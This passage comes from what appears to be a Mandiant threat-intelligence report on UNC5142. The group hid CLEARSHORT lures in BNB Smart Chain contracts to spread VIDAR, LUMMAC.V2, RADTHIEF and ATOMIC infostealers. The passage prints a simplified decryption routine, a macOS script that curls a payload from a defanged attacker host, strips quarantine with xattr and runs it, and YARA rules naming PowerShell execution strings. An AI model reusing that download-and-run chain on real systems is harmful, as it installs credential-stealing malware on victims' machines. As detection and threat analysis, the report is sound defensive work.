<p><span>In December 2024, UNC5142 introduced AES encryption for the CLEARSHORT landing page, shifting away from Base64-encoded payloads that were used previously. Not only does this reduce the effectiveness of some detection efforts, it also increases the difficulty of analysis of the payload by security researchers. The encrypted CLEARSHORT landing page is typically hosted on a Cloudflare </span><span>.dev</span><span> page. The function that decrypts the AES-encrypted landing page uses an initialization vector retrieved from the third smart contract (Figure 9 and Figure 10). The decryption is performed client-side within the victim's browser.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig9a.max-1000x1000.png" alt="AES Key within smart contract transaction">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="yxjen">Figure 9: AES Key within smart contract transaction</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>// Simplified example of the decryption logic
async function decryptScrollToText(encryptedBase64, keyBase64) {
    const key = Uint8Array.from(atob(keyBase64), c =&gt; c.charCodeAt(0));
    const combinedData = Uint8Array.from(atob(encryptedBase64), c =&gt; c.charCodeAt(0));
    const iv = combinedData.slice(0, 12); // IV is the first 12 bytes
    const encryptedData = combinedData.slice(12);
    const cryptoKey = await crypto.subtle.importKey(
        "raw", key, "AES-GCM", false, ["decrypt"]
    );
    const decryptedArrayBuffer = await crypto.subtle.decrypt(
        { name: "AES-GCM", iv },
        cryptoKey,
        encryptedData
    );
    return new TextDecoder().decode(decryptedArrayBuffer);
}

// ... (Code to fetch encrypted HTML and key from the third-level contract) ...

if (cherryBlossomHTML) { // cherryBlossomHTML contains the encrypted landing page
     try {
        let sakuraKey = await JadeContract.methods.pearlTower().call(); // Get the AES key
        const decryptedHTML = await decryptScrollToText(cherryBlossomHTML, sakuraKey);
        // ... (Display the decrypted HTML in an iframe) ...
    } catch (error) {
        return;
    }
}</code></pre>
<p><span>Figure 10: Simplified decryption logic</span></p></div>
<div class="block-paragraph_advanced"><h4><span>CLEARSHORT Templates and Lures</span></h4>
<p><span>UNC5142 has used a variety of lures for their landing page, evolving them over time: </span></p>
<ul>
<li><strong>January 2025:</strong><span> Lures included fake Data Privacy agreements and reCAPTCHA turnstiles (Figure 11 and Figure 12).</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig11.max-1000x1000.png" alt="“Disable Data Collection” CLEARSHORT lure">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1g1gt">Figure 11: “Disable Data Collection” CLEARSHORT lure</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig12.max-1000x1000.png" alt="Fake reCAPTCHA lure">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="1g1gt">Figure 12: Fake reCAPTCHA lure</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><strong>March 2025:</strong><span> The threat cluster began using a lure that mimics a Cloudflare IP web error (Figure 13).</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/unc5142-etherhiding-fig13a.png" alt="Cloudflare “Unusual Web Traffic” error">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6gc7z">Figure 13: Cloudflare “Unusual Web Traffic” error</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><strong>May 2025:</strong><span> An "Anti-Bot Lure" was observed, presenting another variation of a fake verification step (Figure 14).</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig14.max-1000x1000.png" alt="Anti-Bot lure">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="6gc7z">Figure 14: Anti-Bot Lure</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>On-Chain Analysis</span></h4>
<p><span>Mandiant Threat Defense’s analysis of UNC5142's on-chain activity on the BNB Smart Chain reveals a clear and evolving operational strategy. A timeline of their blockchain transactions shows the use of two distinct sets of smart contract infrastructures, which </span><span>GTIG</span><span> tracks as the Main and Secondary infrastructures. Both serve the same ultimate purpose, delivering malware via the CLEARSHORT downloader.</span></p>
<p><span>Leveraging BNB Smart Chain's smart contract similarity search, a process where the compiled bytecode of smart contracts is compared to find functional commonalities, revealed that the Main and Secondary smart contracts were identical at the moment of their creation. This strongly indicates that the same threat actor, UNC5142, is responsible for all observed activity. It is highly likely that the actor cloned their successful Main infrastructure to create the foundation for Secondary, which could then be updated via subsequent transactions to deliver different payloads.</span></p>
<p><span>Further analysis of the funding sources shows that the primary operator wallets for both groups received funds from the same intermediary wallet (</span><a href="https://bscscan.com/address/0x3b5a23f6207d87B423C6789D2625eA620423b32D" rel="noopener" target="_blank"><code>0x3b5a...32D</code></a><span>), an account associated with the OKX cryptocurrency exchange. While attribution based solely on transactions from a high-volume exchange wallet requires caution, this financial link, combined with the identical smart contract code and mirrored deployment methodologies, makes it highly likely that a single threat actor, UNC5142, controls both infrastructures.</span></p>
<h5><span>Parallel Distribution Infrastructures</span></h5>
<p><span>Transaction records show key events for both groups occurring in close proximity, indicating coordinated management.</span></p>
<p><span>On </span><strong>Feb. 18, 2025</strong><span>, not only was the entire Secondary infrastructure created and configured, but the Main operator wallet also received additional funding on the same day. This coordinated funding activity strongly suggests a single actor preparing for and executing an expansion of their operations.</span></p>
<p><span>Furthermore, on </span><strong>March 3, 2025</strong><span>, transaction records show that operator wallets for both Main and Secondary infrastructures conducted payload and lure update activities. This demonstrates concurrent campaign management, where the actor was actively maintaining and running separate distribution efforts through both sets of smart contracts simultaneously.</span></p>
<h5><span>Main</span></h5>
<p><span>Mandiant Threat Defense analysis pinpoints the creation of the Main infrastructure to a brief, concentrated period on </span><strong>Nov. 24, 2024</strong><span>. The primary Main operator wallet (</span><a href="https://bscscan.com/address/0xF5B962Cca374de0b769617888932250363C5971B" rel="noopener" target="_blank"><code>0xF5B9...71B</code></a><span>) was initially funded on the same day </span><span>with </span><strong>0.1 BNB</strong><span> (worth approximately $66 USD at the time)</span><span>. Over the subsequent months, this wallet and its associated intermediary wallets received funding on multiple occasions, ensuring the actor had sufficient BNB to cover transaction fees for ongoing operations.</span></p>
<p><span>The transaction history for Main infrastructure shows consistent updates over the course of the first half of 2025. Following the initial setup, Mandiant observed payload and lure updates occurring on a near-monthly and at times bi-weekly basis from December 2024 through the end of May 2025. This sustained activity, characterized by frequent updates to the third-level smart contract, demonstrates its role as the primary infrastructure for UNC5142's campaigns.</span></p>
<h5><span>Secondary</span></h5>
<p><span>Mandiant Threat Defense observed a significant operational expansion where the actor deployed the new, parallel Secondary infrastructure. The Secondary operator wallet (</span><a href="https://bscscan.com/address/0x9AAe9A373CECe9Ef8453fa2dEAF4bf7B8aFBfac9" rel="noopener" target="_blank"><code>0x9AAe...fac9</code></a><span>) was funded on </span><strong>Feb. 18, 2025</strong><span>, </span><span>receiving </span><strong>0.235 BNB</strong><span> (approximately $152 USD at the time). S</span><span>hortly after, the entire three-contract system was deployed and configured. Mandiant observed that updates to Secondary infrastructure were active between late February and early March 2025. After this initial period, the frequency of updates to the Secondary smart contracts decreased substantially.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig15.max-1000x1000.png" alt="Timeline of UNC5142's on-chain infrastructure">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="5gjnk">Figure 15: Timeline of UNC5142's on-chain infrastructure</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The Main infrastructure stands out as the core campaign infrastructure, marked by its early creation and steady stream of updates. The Secondary infrastructure appears as a parallel, more tactical deployment, likely established to support a specific surge in campaign activity, test new lures, or simply build operational resilience.</span></p>
<p><span>As of this publication, the last observed on-chain update to this infrastructure occurred on July 23, 2025, suggesting a pause in this campaign or a potential shift in the actor's operational methods. </span></p>
<h3><span>Final Payload Distribution</span></h3>
<p><span>Over the past year, Mandiant Threat Defense has observed UNC5142 distribute a wide range of final payloads, including VIDAR, LUMMAC.V2, and RADTHIEF (Figure 16). Given the distribution of a variety of payloads over a range of time, it is possible that UNC5142 functions as a malware distribution threat cluster. Distribution threat clusters play a significant role within the cyber criminal threatscape, providing actors of varying levels of technical sophistication a means to distribute malware and/or gain initial access to victim environments. However, given the consistent distribution of infostealers, it’s also plausible that the threat cluster’s objective is to obtain stolen credentials to facilitate further operations, such as selling the credentials to other threat clusters. While the exact business model of UNC5142 is unclear, GTIG currently does not attribute the final payloads to the threat cluster due to the possibility it is a distribution threat cluster.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig16.max-1000x1000.png" alt="UNC5142 final payload distribution over time">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="5gjnk">Figure 16: UNC5142 final payload distribution over time</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>An analysis of their infection chains since the beginning of 2025 reveals that UNC5142 follows a repeatable four-stage delivery chain after the initial CLEARSHORT lure:</span></p>
<ol>
<li aria-level="1">
<p role="presentation"><strong>The initial dropper:</strong><span> The first stage almost always involves the execution of a remote HTML Application (.hta) file, often disguised with a benign file extension like .xll (Excel Add-in). This component, downloaded from a malicious domain or a legitimate file-sharing service, serves as the entry point for executing code on the victim's system outside the browser's security sandbox.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>The PowerShell loader:</strong><span> The initial dropper’s primary role is to download and execute a second-stage PowerShell script. This script is responsible for defense evasion and orchestrating the download of the final payload.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Abuse of legitimate services:</strong><span> The actor has consistently leveraged legitimate file hosting services such as </span><strong>GitHub</strong><span> and </span><strong>MediaFire</strong><span> to host encrypted data blobs, with some instances observed where final payloads were hosted on their own infrastructure. This tactic helps the malicious traffic blend in with legitimate network activity, bypassing reputation-based security filters.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>In-memory execution:</strong><span> In early January, executables were being used to serve VIDAR, but since then, the final malware payload has transitioned to being delivered as an encrypted data blob disguised as a common file type (e.g., .mp4, .wav, .dat). The PowerShell loader contains the logic to download this blob, decrypt it in memory, and execute the final payload (often a .NET loader), without ever writing the decrypted malware to disk.</span></p>
</li>
</ol></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig17a.max-1000x1000.png" alt="UNC5142 Infostealer delivery infection chain">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="5gjnk">Figure 17: UNC5142 Infostealer delivery infection chain</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Earlier Campaigns</span></h4>
<p><span>In earlier infection chains, the URL for the first-stage </span><strong>.hta</strong><span> dropper was often hardcoded directly into the CLEARSHORT lure's command (e.g., </span><strong>mshta hxxps[:]//...pages.dev</strong><span>). The intermediate PowerShell script would then download the final malware directly from a public repository like GitHub.</span></p>
<h4><span>January 2025</span></h4>
<p><span>The actor’s primary evolution was to stop delivering the malware directly as an executable file. Instead, they began hosting encrypted data blobs on services like MediaFire, disguised as media files (.mp4, .mp3). The PowerShell loaders were updated to include decryption routines (e.g., AES, TripleDES) to decode these blobs in memory, revealing a final-stage .NET dropper or the malware itself.</span></p>
<h4><span>February 2025 &amp; Beyond</span></h4>
<p><span>The most significant change was the deeper integration of their on-chain infrastructure. Instead of hardcoding the dropper URL in the lure, the CLEARSHORT script began making a direct </span><strong>eth_call</strong><span> to the </span><strong>Third-Level Smart Contract</strong><span>. The smart contract now dynamically provides the URL of the first-stage dropper. This gives the actor complete, real-time control over their post-lure infrastructure; they can change the dropper domain, filename, and the entire subsequent chain by simply sending a single, cheap transaction to their smart contract.</span></p>
<p><span>In the infection chain leading to RADTHIEF, Mandiant Threat Defense observed the actor reverting to the older, static method of hardcoding the first-stage URL directly into the lure. This demonstrates that </span><span>UNC5142 uses a flexible approach, adapting its infection methods to suit each campaign.</span></p>
<h3><span>Targeting macOS</span></h3>
<p><span>Notably, the threat cluster has targeted both Windows and macOS systems with their distribution campaigns. In February 2025 and again in April 2025, UNC5142 distributed ATOMIC, an infostealer tailored for macOS. The social engineering lures for these campaigns evolved; while the initial February lure explicitly stated “Instructions For MacOS”, the later April versions were nearly identical to the lures used in their Windows campaigns (Figure 18 and Figure 19). In the February infection chain, the lure prompted the user to run a bash command that retrieved a shell script (Figure 18). This script then used </span><code>curl</code><span> to fetch the ATOMIC payload from the remote server </span><code>hxxps[:]//browser-storage[.]com/update</code><span> and writes the ATOMIC payload to a file named </span><code>/tmp/update</code><span>. (Figure 20). The use of the </span><code>xattr</code><span> command within the bash script is a deliberate defense evasion technique designed to remove the </span><code>com.apple.quarantine</code><span> attribute, which prevents macOS from displaying the security prompt that normally requires user confirmation before running a downloaded application for the first time.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig18.max-1000x1000.png" alt="macOS “Installation Instructions” CLEARSHORT lure from February 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="5gjnk">Figure 18: macOS “Installation Instructions” CLEARSHORT lure from February 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc5142-etherhiding-fig19.max-1000x1000.png" alt="macOS “Verification Steps” CLEARSHORT lure from May 2025">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="5gjnk">Figure 19: macOS “Verification Steps” CLEARSHORT lure from May 2025</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>curl -o /tmp/update https://browser-storage[.]com/update
xattr -c /tmp/update
chmod +x /tmp/update
/tmp/update</code></pre>
<p><span>Figure 20: install.sh shell script contents</span></p></div>
<div class="block-paragraph_advanced"><h3><span>Outlook &amp; Implications</span></h3>
<p><span>Over the past year, UNC5142 has demonstrated agility, flexibility, and an interest in adapting and evolving their operations. Since mid-2024, the threat cluster has tested out and incorporated a wide swath of changes, including the use of multiple smart contracts, AES-encryption of secondary payloads, CloudFlare .dev pages to host landing pages, and the introduction of the ClickFix social engineering technique. It is likely these changes are an attempt to bypass security detections, hinder or complicate analysis efforts, and increase the success of their operations. The reliance on legitimate platforms such as the BNB Smart Chain and Cloudflare pages may lend a layer of legitimacy that helps evade some security detections. Given the frequent updates to the infection chain coupled with the consistent operational tempo, high volume of compromised websites, and diversity of distributed malware payloads over the past year and a half, it is likely that UNC5142 has experienced some level of success with their operations. Despite what appears to be a cessation or pause in UNC5142 activity since July 2025, the threat cluster’s willingness to incorporate burgeoning technology and their previous tendencies to consistently evolve their TTPs could suggest they have more significantly shifted their operational methods in an attempt to avoid detection. </span></p>
<h3><span>Acknowledgements</span></h3>
<p><span>Special acknowledgment to Cian Lynch for involvement in tracking the malware as a service distribution cluster, and to Blas Kojusner for assistance in analyzing infostealer malware samples. We are also grateful to Geoff Ackerman for attribution efforts, as well as Muhammad Umer Khan and Elvis Miezitis for providing detection opportunities. A special thanks goes to Yash Gupta for impactful feedback and coordination, and to Diana Ion for valuable suggestions on the blog post.</span></p>
<h3><span>Detection Opportunities</span></h3>
<p><span>The following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI). </span></p>
<h4><span>Detection Through Google Security Operations</span></h4>
<p><span>Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats </span><a href="https://cloud.google.com/chronicle/docs/detection/curated-detections"><span>curated detections</span></a><span> rule set. The activity detailed in this blog post is associated with several specific MITRE ATT&amp;CK tactics and techniques, which are detected under the following rule names:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>Run Utility Spawning Suspicious Process</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Mshta Remote File Execution</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Powershell Launching Mshta</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Dns Lookup Events To C2 Top Level Domains</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Suspicious Network Connections To Mediafire</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Mshta Launching Powershell</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>Explorer Launches Powershell Hidden Execution</span></p>
</li>
</ul>
<h4><span>MITRE ATT&amp;CK </span></h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong><span>Rule Name</span></strong></p>
</td>
<td>
<p><strong><span>Tactic</span></strong></p>
</td>
<td>
<p><strong><span>Technique</span></strong></p>
</td>
</tr>
<tr>
<td>
<p><span>Run Utility Spawning Suspicious Process</span></p>
</td>
<td>
<p><span>TA0003</span></p>
</td>
<td>
<p><span>T1547.001</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Mshta Remote File Execution</span></p>
</td>
<td>
<p><span>TA0005</span></p>
</td>
<td>
<p><span>T1218.005</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Powershell Launching Mshta</span></p>
</td>
<td>
<p><span>TA0005</span></p>
</td>
<td>
<p><span>T1218.005</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Suspicious Dns Lookup Events To C2 Top Level Domains</span></p>
</td>
<td>
<p><span>TA0011</span></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Suspicious Network Connections To Mediafire</span></p>
</td>
<td>
<p><span>TA0011</span></p>
</td>
<td>
<p><span>T1071.001</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Mshta Launching Powershell</span></p>
</td>
<td>
<p><span>TA0005</span></p>
</td>
<td>
<p><span>T1218.005</span></p>
</td>
</tr>
<tr>
<td>
<p><span>Explorer Launches Powershell Hidden Execution</span></p>
</td>
<td>
<p><span>TA0002</span></p>
</td>
<td>
<p><span>T1059.001</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4><span>YARA Rules</span></h4></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Downloader_CLEARSHORT_1 {
    meta:
        author = "Mandiant"
    strings:
        $payload_b641 = "ipconfig /flushdns" base64
        $payload_b642 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(" base64
        $payload_b643 = "[System.Diagnostics.Process]::Start(" base64
        $payload_b644 = "-ep RemoteSigned -w 1 -enc" base64

        $payload_o1 = "ipconfig /flushdns" nocase ascii wide
        $payload_o2 = "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(" nocase ascii wide
        $payload_o3 = "[System.Diagnostics.Process]::Start(" nocase ascii wide
        $payload_o4 = "-ep RemoteSigned -w 1 -enc" nocase ascii wide


        $htm_o1 = "title: \"Google Chrome\","
        $htm_o2 = "PowerShell"
        $htm_o3 = "navigator.clipboard.writeText"
        $htm_o4 = "document.body.removeChild"
        $htm_o5 = "downloadButton.classList.add('downloadButton');"
        $htm_o6 = "getUserLanguage().substring(0, 2);"
        $htm_o7 = "translateContent(userLang);" 
        
        $htm_b64_1 = "title: \"Google Chrome\"," base64  
        $htm_b64_2 = "PowerShell" base64 
        $htm_b64_3 = "navigator.clipboard.writeText" base64  
        $htm_b64_4 = "document.body.removeChild" base64  
        $htm_b64_5 = "downloadButton.classList.add('downloadButton');" base64  
        $htm_b64_6 = "getUserLanguage().substring(0, 2);" base64  
        $htm_b64_7 = "translateContent(userLang);" base64  
    condition:
        filesize&lt;1MB and (4 of ($payload_b*) or 4 of ($payload_o*) or 4 of ($htm_b*) or  4 of ($htm_o*))
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Downloader_CLEARSHORT_2 {
    meta:
          author = "Mandiant"
    strings:
        $htm1 = "const base64HtmlContent"
        $htm2 = "return decodeURIComponent(escape(atob(str)));"
        $htm3 = "document.body.style.overflow = 'hidden';"
        $htm4 = "document.body.append(popupContainer);"
        $htm5 = "Object.assign(el.style, styles);"
        
        
        $htm_b64_1 = "const base64HtmlContent" base64
        $htm_b64_2 = "return decodeURIComponent(escape(atob(str)));" base64
        $htm_b64_3 = "document.body.style.overflow = 'hidden';" base64
        $htm_b64_4 = "document.body.append(popupContainer);" base64
        $htm_b64_5 = "Object.assign(el.style, styles);" base64

    condition:
        filesize&lt;1MB and 5 of ($htm*)
}</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Downloader_CLEARSHORT_3
{
    meta:
        author = "Mandiant"
    strings:
          
        $smart_contract1 = "9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53" nocase
        $smart_contract2 = "8FBA1667BEF5EdA433928b220886A830488549BD" nocase
        $smart_contract3 = "53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA" nocase
        $smart_contract2_hex = /38(46|66)(42|62)(41|61)31363637(42|62)(45|65)(46|66)35(45|65)(64|44)(41|61)343333393238(42|62)323230383836(41|61)383330343838353439(42|62)(44|64)/
        $smart_contract1_hex = /39313739(64|44)(64|44)(61|41)38(42|62)323835303430(42|62)(66|46)333831(41|61)(41|61)(42|62)(62|42)38(61|41)31(66|46)34(61|41)31(62|42)38(63|43)3337(45|65)(64|44)3533/
        $smart_contract3_hex = /3533(66|46)(64|44)3534(66|46)3535(43|63)3933(66|46)39(42|62)(43|63)(43|63)(41|61)343731(63|43)(44|64)30(43|63)(63|43)(62|42)(61|41)(42|62)(43|63)33(41|61)(63|43)(62|42)(64|44)33(45|65)34(41|61)(41|61)/

        $enc_marker1 = "4834734941444748553263432f34315662572f624"
        $enc_marker2 = "4834734941465775513263432f2b3257775772"

        $c2_marker_capcha = "743617074636861"
        $c2_marker_https = "68747470733a2f2f72"
        $c2_marker_json = "\"jsonrpc\":\"2.0\",\"id\":\""

        $str1 = /Windows\s*\+\s*R/ nocase
        $str2 = /CTRL\s*\+\s*V/ nocase
        $str3 = "navigator.clipboard.writeText" nocase
        $str4 = "captcha" nocase
        $str5 = ".innerHTML" nocase
    
        $payload1 = ".shop" base64
        $payload2 = "[scriptblock]::Create(" nocase
        $payload3 = "HTA:APPLICATION" nocase
    condition:
		filesize &lt; 15MB and (any of ($smart_contract*) or any of ($enc_marker*) or all of ($c2_marker*) or all of ($str*) or all of ($payload*))



}</code></pre></div>
<div class="block-paragraph_advanced"><h4>Host-Based IOCs</h4></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>SHA256</strong></p>
</td>
<td>
<p><strong>Malware Family</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>bcbdb74f97092dfd68e7ec1d6770b6d1e1aae091f43bcebb0b7bce6c8188e310</span></p>
</td>
<td>
<p><span>VIDAR</span></p>
</td>
</tr>
<tr>
<td>
<p><span>88019011af71af986a64f68316e80f30d3f57186aa62c3cef5ed139eb49a6842</span></p>
</td>
<td>
<p><span>VIDAR</span></p>
</td>
</tr>
<tr>
<td>
<p><span>27105be1bdd9f15a1b1a2b0cc5de625e2ecd47fdeaed135321641eea86ad6cb0</span></p>
</td>
<td>
<p><span>VIDAR</span></p>
</td>
</tr>
<tr>
<td>
<p><span>72d8fa46f402dcc4be78306d0535c9ace0eb9fabae59bd3ba3cc62a0bdf3db91</span></p>
</td>
<td>
<p><span>LUMMAC.V2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>3023b0331baff73ff894087d1a425ea4b2746caf514ada624370318f27e29c2c</span></p>
</td>
<td>
<p><span>LUMMAC.V2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>4b47b55ae448668e549ffc04e82aee41ac10e3c8b183012a105faf2360fc5ec1</span></p>
</td>
<td>
<p><span>RADTHIEF</span></p>
</td>
</tr>
<tr>
<td>
<p><span>091f9db54382708327f5bb1831a4626897b6710ffe11d835724be5c224a0cf83</span></p>
</td>
<td>
<p><span>ATOMIC</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h4>Network-Based IOCs</h4></div>
<div class="block-paragraph_advanced"><div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Date</strong></p>
</td>
<td>
<p><strong>CLEARSHORT Hosting URL</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-30</span></p>
</td>
<td>
<p><span>hXXps://yie-cpj[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-05</span></p>
</td>
<td>
<p><span>hXXps://n51v[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-05</span></p>
</td>
<td>
<p><span>hXXps://lightsoi[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-01</span></p>
</td>
<td>
<p><span>hXXps://stat[.]bluetroniq[.]vip/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-05-01</span></p>
</td>
<td>
<p><span>hXXps://tnop[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-30</span></p>
</td>
<td>
<p><span>hXXps://app.bytevista[.]cloud/wfree</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-30</span></p>
</td>
<td>
<p><span>hXXps://ho8[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-30</span></p>
</td>
<td>
<p><span>hXXps://z1z[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-30</span></p>
</td>
<td>
<p><span>hXXps://yuun[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-29</span></p>
</td>
<td>
<p><span>hXXps://tuboos[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-29</span></p>
</td>
<td>
<p><span>hXXps://min-js-lib[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-28</span></p>
</td>
<td>
<p><span>hXXps://yoloff[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-28</span></p>
</td>
<td>
<p><span>hXXps://relmake[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-26</span></p>
</td>
<td>
<p><span>hXXps://javascript-67t[.]pages[.]dev/</span></p>
</td>
</tr>
<tr>
<td>
<p><span>2025-04-25</span></p>
</td>
<td>
<p><span>hXXps://sticker-88l[.]pages[.]dev/support</span></p>
</td>
</tr>
